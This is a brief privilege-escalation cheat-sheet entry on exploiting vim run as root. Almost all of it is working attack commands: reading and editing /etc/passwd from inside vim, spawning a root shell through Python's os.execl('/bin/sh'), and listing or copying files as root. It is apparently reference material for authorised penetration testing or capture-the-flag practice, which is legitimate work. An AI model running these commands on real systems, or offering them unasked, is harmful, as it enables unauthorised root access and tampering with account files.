Investigation
If we can execute "vim" command as root, we can execute the shell command in the vim editor.
Exploitation
Simply run "vim" command as root.
In Vim editor, we can run shell commands as root.
Options
# Read environment variables
# - We can list them by entering [tab] key after `:echo $`.
:echo $PATH
# Read another file
:read /etc/passwd
# Edit another file
:edit /etc/passwd
# Execute Python script
:py import os;os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
:py3 import os;os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
# Enumeration
:py3 import os;print(os.listdir("/"))
# Write file from another file
:py3 open("/tmp/new_file", "wb").write(open("/tmp/original_file", "rb").read())